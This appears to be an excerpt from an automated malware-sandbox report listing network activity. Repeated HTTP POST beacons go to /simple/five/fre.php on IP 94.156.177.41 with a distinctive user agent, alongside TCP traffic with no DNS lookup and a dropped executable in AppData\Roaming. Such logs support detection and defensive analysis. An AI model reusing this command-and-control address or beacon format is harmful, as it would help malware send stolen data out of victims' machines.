              Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
              Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
              Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
              Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
              Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
              Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
              Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
              Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
              Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
              Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
              Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
              Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
              Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
              Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
              Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
              Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
              Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
              Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
              Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
              Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
              Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
              Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
              Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
              Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
              Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
              Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
              Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
              Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
              Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
              Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
              Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
              Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
              Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
              Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
              Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
              Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
              Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
              Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
              Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
              Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
              Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
              Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
              Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
              Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
              Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
              Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
              Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
              Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
              Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
              Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
              Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
              Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
              Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
              Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
              Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
              Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
              Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
              Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
              Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
              Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
              Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
              Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
              Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
              Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
              Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
              Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
              Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
              Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
              Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
              Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
              Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
              Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
              Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
              Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
              Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
              Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
              Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
              Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
              Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
              Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
              Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
              Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
              Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
              Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
              Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
              Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
              Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
              Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
              Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
              Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
              Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
              Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
              Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
              Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
              Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
              Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
              Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
              Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
              Source: C:\Users\user\AppData\Roaming\HxQXdrrQ.exeCode function: 15_2_00404ED4 recv,15_2_00404ED4
              Source: unknownHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 180Connection: close
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 06:44:26 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
